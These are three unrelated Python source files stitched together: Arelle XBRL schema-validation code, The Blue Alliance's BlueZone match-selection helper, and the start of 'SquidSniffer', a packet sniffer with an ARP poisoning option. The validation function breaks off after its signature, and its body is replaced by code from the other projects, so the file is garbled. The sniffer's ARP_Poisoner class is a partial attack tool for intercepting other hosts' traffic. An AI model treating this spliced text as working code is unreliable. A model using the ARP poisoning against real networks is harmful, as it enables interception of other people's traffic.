normalizeWhitespacePattern = re_compile(r"[\t\n\r]") # replace tab, line feed, return with space (XML Schema Rules, note: does not include NBSP)
collapseWhitespacePattern = re_compile(r"[ \t\n\r]+") # collapse multiple spaces, tabs, line feeds and returns to single space
entirelyWhitespacePattern = re_compile(r"^[ \t\n\r]+$") # matches strings consisting entirely of whitespace
languagePattern = re_compile("[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$")
NCNamePattern = re_compile("^[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
QNamePattern = re_compile("^([_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*:)?"
"[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\."
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
namePattern = re_compile("^[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
r"[_\-\.:"
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]*$")
NMTOKENPattern = re_compile(r"[_\-\.:"
"\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]+$")
decimalPattern = re_compile(r"^[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)$")
integerPattern = re_compile(r"^[+-]?([0-9]+)$")
floatPattern = re_compile(r"^(\+|-)?([0-9]+(\.[0-9]*)?|\.[0-9]+)([Ee](\+|-)?[0-9]+)?$|^(\+|-)?INF$|^NaN$")
lexicalPatterns = {
"duration": re_compile(r"-?P((([0-9]+Y([0-9]+M)?([0-9]+D)?|([0-9]+M)([0-9]+D)?|([0-9]+D))(T(([0-9]+H)([0-9]+M)?([0-9]+(\.[0-9]+)?S)?|([0-9]+M)([0-9]+(\.[0-9]+)?S)?|([0-9]+(\.[0-9]+)?S)))?)|(T(([0-9]+H)([0-9]+M)?([0-9]+(\.[0-9]+)?S)?|([0-9]+M)([0-9]+(\.[0-9]+)?S)?|([0-9]+(\.[0-9]+)?S))))$"),
"gYearMonth": re_compile(r"-?([1-9][0-9]{3,}|0[0-9]{3})-(0[1-9]|1[0-2])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gYear": re_compile(r"-?([1-9][0-9]{3,}|0[0-9]{3})(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gMonthDay": re_compile(r"--(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[01])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gDay": re_compile(r"---(0[1-9]|[12][0-9]|3[01])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"gMonth": re_compile(r"--(0[1-9]|1[0-2])(Z|(\+|-)((0[0-9]|1[0-3]):[0-5][0-9]|14:00))?$"),
"language": re_compile(r"[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$"),
"XBRLI_DATEUNION": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}(T[0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?)?(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
"dateTime": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
"date": re_compile(r"\s*-?[0-9]{4}-[0-9]{2}-[0-9]{2}(Z|[+-][0-9]{2}:[0-9]{2})?\s*$"),
}
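# For example, "P1Y2MT3H" and "-P30D" are valid xs:duration lexical forms, and
# "2011-02-20T09:30:00Z" is accepted by the dateTime pattern above.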
# patterns difficult to compile into python
xmlSchemaPatterns = {
r"\c+": NMTOKENPattern,
r"\i\c*": namePattern,
r"[\i-[:]][\c-[:]]*": NCNamePattern,
}
# patterns to replace \c and \i in names
iNameChar = "[_A-Za-z\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]"
cNameChar = r"[_\-\.:" "\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]"
cMinusCNameChar = r"[_\-\." "\xB7A-Za-z0-9\xC0-\xD6\xD8-\xF6\xF8-\xFF\u0100-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u0300-\u036F\u203F-\u2040]"
baseXsdTypePatterns = {
"Name": namePattern,
"language": languagePattern,
"languageOrEmpty": re_compile(r"[a-zA-Z]{1,8}(-[a-zA-Z0-9]{1,8})*$|$"),
"NMTOKEN": NMTOKENPattern,
"NCName": NCNamePattern,
"ID": NCNamePattern,
"IDREF": NCNamePattern,
"ENTITY": NCNamePattern,
"QName": QNamePattern,
}
predefinedAttributeTypes = {
qname("{http://www.w3.org/XML/1998/namespace}xml:lang"):("languageOrEmpty",None),
qname("{http://www.w3.org/XML/1998/namespace}xml:space"):("NCName",{"enumeration":{"default","preserve"}})}
xAttributesSharedEmptyDict = {}
def validate(modelXbrl, elt, recurse=True, attrQname=None, ixFacts=False):
global ModelInlineValueObject, ixMsgCode
if ModelInlineValueObject is None:
from arelle.ModelInstanceObject import ModelInlineValueObject
from arelle.XhtmlValidate import ixMsgCode
isIxFact = isinstance(elt, ModelInlineValueObject)
facets = None
# attrQname can be provided for attributes that are global and LAX
if (getattr(elt,"xValid", UNVALIDATED) == UNVALIDATED) and (not isIxFact or ixFacts):
qnElt = elt.qname if ixFacts and isIxFact else elt.elementQname
modelConcept = modelXbrl.qnameConcepts.get(qnElt)
isAbstract = False
if modelConcept is not None:
isNillable = modelConcept.isNillable
type = modelConcept.type
if modelConcept.isAbstract:
baseXsdType = "noContent"
isAbstract = True
elif modelConcept.isFraction:
baseXsdType = "fraction"
else:
baseXsdType = modelConcept.baseXsdType
facets = modelConcept.facets
elif qnElt == XbrlConst.qnXbrldiExplicitMember: # not in DTS
baseXsdType = "QName"
type = None
isNillable = False
elif qnElt == XbrlConst.qnXbrldiTypedMember: # not in DTS
baseXsdType = "noContent"
type = None
isNillable = False
else:
baseXsdType = None
type = None
isNillable = True # allow nil if no schema definition
isNil = elt.get("{http://www.w3.org/2001/XMLSchema-instance}nil") in ("true", "1")
if attrQname is None:
if isNil and not isNillable:
if ModelInlineValueObject is not None and isinstance(elt, ModelInlineValueObject):
errElt = "{0} fact {1}".format(elt.elementQname, elt.qname)
else:
errElt = elt.elementQname
modelXbrl.error("xmlSchema:nilNonNillableElement",
_("Element %(element)s fact %(fact)s type %(typeName)s is nil but element has not been defined nillable"),
modelObject=elt, element=errElt, fact=elt.qname,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown")
try:
if isAbstract:
raise ValueError("element is abstract")
if isNil:
text = ""
elif baseXsdType == "noContent":
text = elt.textValue # no descendant text nodes
else:
text = elt.stringValue # include descendant text nodes
if modelConcept is not None:
if len(text) == 0:
if modelConcept.default is not None:
text = modelConcept.default
elif modelConcept.fixed is not None:
text = modelConcept.fixed
if baseXsdType == "token" and modelConcept.isEnumeration:
if modelConcept.instanceOfType(XbrlConst.qnEnumeration2ItemTypes):
baseXsdType = "enumerationHrefs"
else:
baseXsdType = "enumerationQNames"
except Exception as err:
if ModelInlineValueObject is not None and isinstance(elt, ModelInlineValueObject):
errElt = "{0} fact {1}".format(elt.elementQname, elt.qname)
else:
errElt = elt.elementQname
if isIxFact and err.__class__.__name__ == "FunctionArgType":
modelXbrl.error(ixMsgCode("transformValueError", elt),
_("Inline element %(element)s fact %(fact)s type %(typeName)s transform %(transform)s value error: %(value)s"),
modelObject=elt, element=errElt, fact=elt.qname, transform=elt.format,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown",
value=XmlUtil.innerText(elt, ixExclude=True, ixContinuation=elt.namespaceURI==XbrlConst.ixbrl11))
elif isIxFact and err.__class__.__name__ == "ixtFunctionNotAvailable":
modelXbrl.error(ixMsgCode("invalidTransformation", elt, sect="validation"),
_("Fact %(fact)s has unrecognized transformation %(transform)s, value: %(value)s"),
modelObject=elt, element=errElt, fact=elt.qname, transform=elt.format,
typeName=modelConcept.baseXsdType if modelConcept is not None else "unknown",
value=XmlUtil.innerText(elt, ixExclude=True, ixContinuation=elt.namespaceURI==XbrlConst.ixbrl11))
elif isAbstract:
modelXbrl.error("xmlSchema:abstractElement",
_("Element %(element)s has abstract declaration, value: %(value)s"),
modelObject=elt, element=errElt, error=str(err), value=elt.text)
else:
modelXbrl.error("xmlSchema:valueError",
_("Element %(element)s error %(error)s value: %(value)s"),
modelObject=elt, element=errElt, error=str(err), value=elt.text)
elt.sValue = elt.xValue = text = INVALIDixVALUE
elt.xValid = INVALID
if text is not INVALIDixVALUE:
validateValue(modelXbrl, elt, None, baseXsdType, text, isNillable, isNil, facets)
# note that elt.sValue and elt.xValue are not innerText but only text elements on specific element (or attribute)
if type is not None:
definedAttributes = type.attributes
else:
definedAttributes = {}
presentAttributes = set()
# validate attributes
# find missing attributes for default values
for attrTag, attrValue in elt.items():
qn = qnameClarkName(attrTag)
#qn = qname(attrTag, noPrefixIsNoNamespace=True)
baseXsdAttrType = None
facets = None
if attrQname is not None: # validate all attributes and element
if attrQname != qn:
continue
elif type is not None:
presentAttributes.add(qn)
if qn in definedAttributes: # look for concept-type-specific attribute definition
modelAttr = definedAttributes[qn]
elif qn.namespaceURI: # may be a globally defined attribute
modelAttr = modelXbrl.qnameAttributes.get(qn)
else:
modelAttr = None
if modelAttr is not None:
baseXsdAttrType = modelAttr.baseXsdType
facets = modelAttr.facets
if baseXsdAttrType is None: # look for global attribute definition
attrObject = modelXbrl.qnameAttributes.get(qn)
if attrObject is not None:
baseXsdAttrType = attrObject.baseXsdType
facets = attrObject.facets
elif attrTag == "{http://xbrl.org/2006/xbrldi}dimension": # some fallbacks?
baseXsdAttrType = "QName"
elif attrTag == "id":
baseXsdAttrType = "ID"
elif elt.namespaceURI == "http://www.w3.org/2001/XMLSchema":
if attrTag in {"type", "ref", "base", "refer", "itemType"}:
baseXsdAttrType = "QName"
elif attrTag in {"name"}:
baseXsdAttrType = "NCName"
elif attrTag in {"default", "fixed", "form"}:
baseXsdAttrType = "string"
elif elt.namespaceURI == "http://xbrl.org/2006/xbrldi":
if attrTag == "dimension":
baseXsdAttrType = "QName"
elif qn in predefinedAttributeTypes:
baseXsdAttrType, facets = predefinedAttributeTypes[qn]
validateValue(modelXbrl, elt, attrTag, baseXsdAttrType, attrValue, facets=facets)
# if no attributes assigned above, there won't be an xAttributes, if so assign a shared dict to save memory
try:
elt.xAttributes
except AttributeError:
elt.xAttributes = xAttributesSharedEmptyDict
if type is not None:
if attrQname is None:
missingAttributes = type.requiredAttributeQnames - presentAttributes - elt.slottedAttributesNames
if missingAttributes:
modelXbrl.error("xmlSchema:attributesRequired",
_("Element %(element)s type %(typeName)s missing required attributes: %(attributes)s"),
modelObject=elt,
element=qnElt,
typeName=baseXsdType,
attributes=','.join(str(a) for a in missingAttributes))
extraAttributes = presentAttributes - _DICT_SET(definedAttributes.keys()) - XbrlConst.builtinAttributes
if extraAttributes:
attributeWildcards = type.attributeWildcards
extraAttributes -= set(a
for a in extraAttributes
if validateAnyWildcard(qnElt, a, attributeWildcards))
if isIxFact:
extraAttributes -= XbrlConst.ixAttributes
if extraAttributes:
modelXbrl.error("xmlSchema:attributesExtraneous",
_("Element %(element)s type %(typeName)s extraneous attributes: %(attributes)s"),
modelObject=elt,
element=qnElt,
typeName=baseXsdType,
attributes=','.join(str(a) for a in extraAttributes))
# add default attribute values
for attrQname in (type.defaultAttributeQnames - presentAttributes):
modelAttr = type.attributes[attrQname]
validateValue(modelXbrl, elt, attrQname.clarkNotation, modelAttr.baseXsdType, modelAttr.default, facets=modelAttr.facets)
if recurse:
global validateElementSequence, modelGroupCompositorTitle
if validateElementSequence is None:
from arelle.XmlValidateParticles import validateElementSequence, modelGroupCompositorTitle
try:
#childElts = list(elt) # uses __iter__ for inline facts
childElts = [e for e in elt if isinstance(e, ModelObject)]
if isNil:
if childElts or elt.text:
modelXbrl.error("xmlSchema:nilElementHasContent",
_("Element %(element)s is nil but has contents"),
modelObject=elt,
element=qnElt)
else:
errResult = validateElementSequence(modelXbrl, type, childElts, ixFacts)
if errResult is not None and errResult[2]:
iElt, occured, errDesc, errArgs = errResult
errElt = childElts[iElt] if iElt < len(childElts) else elt
errArgs["modelObject"] = errElt
errArgs["element"] = errElt.qname
errArgs["parentElement"] = elt.qname
if "compositor" in errArgs: # compositor is an object, provide friendly string
errArgs["compositor"] = modelGroupCompositorTitle(errArgs["compositor"])
modelXbrl.error(*errDesc,**errArgs)
# when error is in an xbrli element, check any further unvalidated children
if qnElt.namespaceURI == XbrlConst.xbrli and iElt < len(childElts):
for childElt in childElts[iElt:]:
if (getattr(childElt,"xValid", UNVALIDATED) == UNVALIDATED):
validate(modelXbrl, childElt, ixFacts=ixFacts)
recurse = False # cancel child element validation below, recursion was within validateElementSequence
except AttributeError as ex:
raise ex
#pass # HF Why is this here????
if recurse: # if there is no complex or simple type (such as xbrli:measure) then this code is used
for child in (elt.modelTupleFacts if ixFacts and isIxFact else elt):
if isinstance(child, ModelObject):
validate(modelXbrl, child, recurse, attrQname, ixFacts)
def validateValue(modelXbrl, elt, attrTag, baseXsdType, value, isNillable=False, isNil=False, facets=None):
import cloudstorage
import datetime
import json
import logging
from helpers.firebase.firebase_pusher import FirebasePusher
from helpers.match_helper import MatchHelper
from helpers.outgoing_notification_helper import OutgoingNotificationHelper
from models.event import Event
from models.match import Match
from models.sitevar import Sitevar
class BlueZoneHelper(object):
TIME_PATTERN = "%Y-%m-%dT%H:%M:%S"
MAX_TIME_PER_MATCH = datetime.timedelta(minutes=5)
# BUFFER_AFTER = datetime.timedelta(minutes=4)
TIME_BUCKET = datetime.timedelta(minutes=5)
@classmethod
def get_upcoming_matches(cls, live_events, n=1):
matches = []
for event in live_events:
upcoming_matches = MatchHelper.upcomingMatches(event.matches, n)
matches.extend(upcoming_matches)
return matches
@classmethod
def get_upcoming_match_predictions(cls, live_events):
predictions = {}
for event in live_events:
if event.details and event.details.predictions:
try:
predictions.update(event.details.predictions.get('match_predictions', {}))
except Exception, e:
logging.info("get_upcoming_match_predictions failed!")
logging.info(e)
return predictions
# @classmethod
# def should_add_match(cls, matches, candidate_match, current_match, predictions, current_timeout):
# now = datetime.datetime.now()
# if current_match and candidate_match.key_name == current_match.key_name and current_timeout is not None and now > current_timeout:
# # We've been on this match for too long, try something else
# return None
# if candidate_match.predicted_time > now + cls.MAX_TIME_PER_MATCH:
# # If this match starts too far in the future, don't include it
# return None
# # If this match conflicts with the current match, don't bother trying
# if current_match and candidate_match.predicted_time <= current_match.predicted_time + cls.BUFFER_AFTER:
# return None
# # Can we put this match in the beginning of the list?
# if not matches or candidate_match.predicted_time + cls.BUFFER_AFTER <= matches[0].predicted_time:
# return 0
# for i in range(1, len(matches)):
# # Can we insert this match in between these two
# last_match = matches[i - 1]
# next_match = matches[i]
# if candidate_match.predicted_time >= last_match.predicted_time + cls.BUFFER_AFTER:
# if candidate_match.predicted_time + cls.BUFFER_AFTER <= next_match.predicted_time:
# if candidate_match.key_name in predictions:
# return i
# # Can we put this match at the end of the list?
# if matches and candidate_match.predicted_time >= matches[-1].predicted_time + cls.BUFFER_AFTER:
# return len(matches)
# return None
@classmethod
def calculate_match_hotness(cls, matches, predictions):
max_hotness = 0
min_hotness = float('inf')
for match in matches:
if not match.has_been_played and match.key.id() in predictions:
prediction = predictions[match.key.id()]
red_score = prediction['red']['score']
blue_score = prediction['blue']['score']
if red_score > blue_score:
winner_score = red_score
loser_score = blue_score
else:
winner_score = blue_score
loser_score = red_score
hotness = winner_score + 2.0*loser_score # Favor close high scoring matches
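                    # e.g. a predicted 100-90 match scores 100 + 2*90 = 280 while a
                    # 150-30 blowout scores 150 + 2*30 = 210, so the closer match
                    # ranks hotter before the normalization below.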
max_hotness = max(max_hotness, hotness)
min_hotness = min(min_hotness, hotness)
match.hotness = hotness
else:
match.hotness = 0
for match in matches:
match.hotness = 100 * (match.hotness - min_hotness) / (max_hotness - min_hotness)
@classmethod
def build_fake_event(cls):
return Event(id='bluezone',
name='TBA BlueZone (BETA)',
event_short='bluezone',
year=datetime.datetime.now().year,
webcast_json=json.dumps([{'type': 'twitch', 'channel': 'firstinspires'}])) # Default to this webcast
@classmethod
def update_bluezone(cls, live_events):
"""
Find the current best match to watch
Currently favors showing something over nothing, is okay with switching
TO a feed in the middle of a match, but avoids switching FROM a feed
in the middle of a match.
1. Get the earliest predicted unplayed match across all live events
2. Get all matches that start within TIME_BUCKET of that match
3. Switch to hottest match in that bucket unless MAX_TIME_PER_MATCH is
hit (in which case blacklist for the future)
4. Repeat
"""
now = datetime.datetime.now()
logging.info("[BLUEZONE] Current time: {}".format(now))
to_log = '--------------------------------------------------\n'
to_log += "[BLUEZONE] Current time: {}\n".format(now)
slack_sitevar = Sitevar.get_or_insert('slack.hookurls')
slack_url = None
if slack_sitevar:
slack_url = slack_sitevar.contents.get('bluezone', '')
bluezone_config = Sitevar.get_or_insert('bluezone')
logging.info("[BLUEZONE] Config (updated {}): {}".format(bluezone_config.updated, bluezone_config.contents))
to_log += "[BLUEZONE] Config (updated {}): {}\n".format(bluezone_config.updated, bluezone_config.contents)
current_match_key = bluezone_config.contents.get('current_match')
last_match_key = bluezone_config.contents.get('last_match')
current_match_predicted_time = bluezone_config.contents.get('current_match_predicted')
if current_match_predicted_time:
current_match_predicted_time = datetime.datetime.strptime(current_match_predicted_time, cls.TIME_PATTERN)
current_match_switch_time = bluezone_config.contents.get('current_match_switch_time')
if current_match_switch_time:
current_match_switch_time = datetime.datetime.strptime(current_match_switch_time, cls.TIME_PATTERN)
else:
current_match_switch_time = now
blacklisted_match_keys = bluezone_config.contents.get('blacklisted_matches', set())
if blacklisted_match_keys:
blacklisted_match_keys = set(blacklisted_match_keys)
blacklisted_event_keys = bluezone_config.contents.get('blacklisted_events', set())
if blacklisted_event_keys:
blacklisted_event_keys = set(blacklisted_event_keys)
current_match = Match.get_by_id(current_match_key) if current_match_key else None
last_match = Match.get_by_id(last_match_key) if last_match_key else None
logging.info("[BLUEZONE] live_events: {}".format([le.key.id() for le in live_events]))
to_log += "[BLUEZONE] live_events: {}\n".format([le.key.id() for le in live_events])
live_events = filter(lambda e: e.webcast_status != 'offline', live_events)
for event in live_events: # Fetch all matches and details asynchronously
event.prep_matches()
event.prep_details()
logging.info("[BLUEZONE] Online live_events: {}".format([le.key.id() for le in live_events]))
to_log += "[BLUEZONE] Online live_events: {}\n".format([le.key.id() for le in live_events])
upcoming_matches = cls.get_upcoming_matches(live_events)
upcoming_matches = filter(lambda m: m.predicted_time is not None, upcoming_matches)
upcoming_predictions = cls.get_upcoming_match_predictions(live_events)
# (1, 2) Find earliest predicted unplayed match and all other matches
# that start within TIME_BUCKET of that match
upcoming_matches.sort(key=lambda match: match.predicted_time)
potential_matches = []
time_cutoff = None
logging.info("[BLUEZONE] all upcoming matches sorted by predicted time: {}".format([um.key.id() for um in upcoming_matches]))
to_log += "[BLUEZONE] all upcoming sorted by predicted time: {}\n".format([um.key.id() for um in upcoming_matches])
for match in upcoming_matches:
if match.predicted_time:
if time_cutoff is None:
time_cutoff = match.predicted_time + cls.TIME_BUCKET
potential_matches.append(match)
elif match.predicted_time < time_cutoff:
potential_matches.append(match)
else:
break # Matches are sorted by predicted_time
logging.info("[BLUEZONE] potential_matches sorted by predicted time: {}".format([pm.key.id() for pm in potential_matches]))
to_log += "[BLUEZONE] potential_matches sorted by predicted time: {}\n".format([pm.key.id() for pm in potential_matches])
# (3) Choose hottest match that's not blacklisted
cls.calculate_match_hotness(potential_matches, upcoming_predictions)
potential_matches.sort(key=lambda match: -match.hotness)
logging.info("[BLUEZONE] potential_matches sorted by hotness: {}".format([pm.key.id() for pm in potential_matches]))
to_log += "[BLUEZONE] potential_matches sorted by hotness: {}\n".format([pm.key.id() for pm in potential_matches])
bluezone_matches = []
new_blacklisted_match_keys = set()
# If the current match hasn't finished yet, don't even bother
cutoff_time = current_match_switch_time + cls.MAX_TIME_PER_MATCH
logging.info("[BLUEZONE] Current match played? {}, now = {}, cutoff = {}".format(current_match.has_been_played if current_match else None, now, cutoff_time))
to_log += "[BLUEZONE] Current match played? {}, now = {}, cutoff = {}\n".format(current_match.has_been_played if current_match else None, now, cutoff_time)
if current_match and not current_match.has_been_played and now < cutoff_time \
and current_match_key not in blacklisted_match_keys \
and current_match.event_key_name not in blacklisted_event_keys:
logging.info("[BLUEZONE] Keeping current match {}".format(current_match.key.id()))
to_log += "[BLUEZONE] Keeping current match {}\n".format(current_match.key.id())
bluezone_matches.append(current_match)
for match in potential_matches:
if len(bluezone_matches) >= 2: # one current, one future
break
logging.info("[BLUEZONE] Trying potential match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Trying potential match: {}\n".format(match.key.id())
if filter(lambda m: m.key.id() == match.key.id(), bluezone_matches):
logging.info("[BLUEZONE] Match {} already chosen".format(match.key.id()))
to_log += "[BLUEZONE] Match {} already chosen\n".format(match.key.id())
continue
if match.event_key_name in blacklisted_event_keys:
logging.info("[BLUEZONE] Event {} is blacklisted, skipping...".format(match.event_key_name))
to_log += "[BLUEZONE] Event {} is blacklisted, skipping...\n".format(match.event_key_name)
continue
if match.key.id() not in blacklisted_match_keys:
if match.key.id() == current_match_key:
if current_match_predicted_time and cutoff_time < now and len(potential_matches) > 1:
# We've been on this match too long
new_blacklisted_match_keys.add(match.key.id())
logging.info("[BLUEZONE] Adding match to blacklist: {}".format(match.key.id()))
to_log += "[BLUEZONE] Adding match to blacklist: {}\n".format(match.key.id())
logging.info("[BLUEZONE] scheduled time: {}, now: {}".format(current_match_predicted_time, now))
to_log += "[BLUEZONE] scheduled time: {}, now: {}\n".format(current_match_predicted_time, now)
OutgoingNotificationHelper.send_slack_alert(slack_url, "Blacklisting match {}. Predicted time: {}, now: {}".format(match.key.id(), current_match_predicted_time, now))
else:
# We can continue to use this match
bluezone_matches.append(match)
logging.info("[BLUEZONE] Continuing to use match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Continuing to use match: {}\n".format(match.key.id())
else:
# Found a new good match
bluezone_matches.append(match)
logging.info("[BLUEZONE] Found a good new match: {}".format(match.key.id()))
to_log += "[BLUEZONE] Found a good new match: {}\n".format(match.key.id())
else:
logging.info("[BLUEZONE] Match already blacklisted: {}".format(match.key.id()))
to_log += "[BLUEZONE] Match already blacklisted: {}\n".format(match.key.id())
new_blacklisted_match_keys.add(match.key.id())
if not bluezone_matches:
logging.info("[BLUEZONE] No match selected")
to_log += "[BLUEZONE] No match selected\n"
logging.info("[BLUEZONE] All selected matches: {}".format([m.key.id() for m in bluezone_matches]))
to_log += "[BLUEZONE] All selected matches: {}\n".format([m.key.id() for m in bluezone_matches])
# (3) Switch to hottest match
fake_event = cls.build_fake_event()
if bluezone_matches:
bluezone_match = bluezone_matches[0]
real_event = filter(lambda x: x.key_name == bluezone_match.event_key_name, live_events)[0]
# Create Fake event for return
fake_event.webcast_json = json.dumps([real_event.current_webcasts[0]])
if bluezone_match.key_name != current_match_key:
current_match_switch_time = now
logging.info("[BLUEZONE] Switching to: {}".format(bluezone_match.key.id()))
to_log += "[BLUEZONE] Switching to: {}\n".format(bluezone_match.key.id())
OutgoingNotificationHelper.send_slack_alert(slack_url, "It is now {}. Switching BlueZone to {}, scheduled for {} and predicted to be at {}.".format(now, bluezone_match.key.id(), bluezone_match.time, bluezone_match.predicted_time))
if not current_match or current_match.has_been_played:
last_match = current_match
# Only need to update if things changed
if bluezone_match.key_name != current_match_key or new_blacklisted_match_keys != blacklisted_match_keys:
FirebasePusher.update_event(fake_event)
bluezone_config.contents = {
'current_match': bluezone_match.key.id(),
'last_match': last_match.key.id() if last_match else '',
'current_match_predicted': bluezone_match.predicted_time.strftime(cls.TIME_PATTERN),
'blacklisted_matches': list(new_blacklisted_match_keys),
'blacklisted_events': list(blacklisted_event_keys),
'current_match_switch_time': current_match_switch_time.strftime(cls.TIME_PATTERN),
}
bluezone_config.put()
# Log to cloudstorage
log_dir = '/tbatv-prod-hrd.appspot.com/tba-logging/bluezone/'
log_file = 'bluezone_{}.txt'.format(now.date())
full_path = log_dir + log_file
existing_contents = ''
if full_path in set([f.filename for f in cloudstorage.listbucket(log_dir)]):
with cloudstorage.open(full_path, 'r') as existing_file:
existing_contents = existing_file.read()
with cloudstorage.open(full_path, 'w') as new_file:
new_file.write(existing_contents + to_log)
bluezone_matches.insert(0, last_match)
        bluezone_matches = filter(lambda m: m is not None, bluezone_matches)
<reponame>Egida/Ethical-Hacking-Scripts<gh_stars>10-100
import socket, binascii, struct, os, sys, time, threading
from optparse import OptionParser
from scapy.all import *
class OptionParse:
def __init__(self):
self.arg_parse()
def logo(self):
print("""\033[0;31;40m
_____ _ _ _____ _ __ __ __ ___
/ ____| (_) | |/ ____| (_)/ _|/ _| /_ | / _ \
| (___ __ _ _ _ _ __| | (___ _ __ _| |_| |_ ___ _ __ __ _| || | | |
\___ \ / _` | | | | |/ _` |\___ \| '_ \| | _| _/ _ \ '__| \ \ / / || | | |
____) | (_| | |_| | | (_| |____) | | | | | | | || __/ | \ V /| || |_| |
|_____/ \__, |\__,_|_|\__,_|_____/|_| |_|_|_| |_| \___|_| \_/ |_(_)___/
| |
|_|
Packet-Sniffing Script by DrSquid""")
def usage(self):
self.logo()
print("""
[+] Option Parsing Help:
[+] -t, --translate - Script translates any incoming traffic and displays it in the output.
[+] -r, --raw - Script displays raw network traffic in output.
[+] -l, --log - Script Logs Network Traffic headers.
[+] -i, --info - Shows this message.
[+] -p, --poison - ARP Poisons a specified IP.
[+] -a, --address - Only Display Traffic from the provided IP Address.
[+] Usage:
[+] python3 SquidSniffer.py -t -r
[+] python3 SquidSniffer.py -t -a <ipaddress> -p <ipaddress>
[+] python3 SquidSniffer.py -i
""")
def arg_parse(self):
args = OptionParser()
args.add_option("-t","--translate", action="store_true", dest="translate")
args.add_option("-r","--raw",action="store_true",dest="raw")
args.add_option("-i","--info",action="store_true",dest="info")
args.add_option("-l", "--log", action="store_true", dest="log")
args.add_option("-p", "--poison", dest="poisontarget")
args.add_option("-a", "--address", dest="address")
opt,arg = args.parse_args()
if opt.info is not None:
self.usage()
sys.exit()
else:
pass
if opt.poisontarget is not None:
poison = opt.poisontarget
else:
poison = None
if opt.address is not None:
address = opt.address
else:
address = None
if opt.translate is not None:
translate = True
else:
translate = False
if opt.log is not None:
log = True
else:
log = False
if opt.raw is not None:
raw = True
else:
raw = False
self.logo()
sniffer = PacketSniffer(translate, raw, log, poison, address)
print("[+] Preparing to recieve packets......\n")
time.sleep(5)
sniffing = threading.Thread(target=sniffer.sniffing)
sniffing.start()
class ARP_Poisoner:
def __init__(self, targ_ip, gate_ip):
self.targ_ip = targ_ip
self.gate_ip = gate_ip
def obtain_macaddress(self, ip):
arpbroadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=ip)
recv = srp(arpbroadcast, timeout=2, verbose=False)
return recv[0][0][1].hwsrc
def send_arp_pkt(self, targetip, targetmac, sourceip):
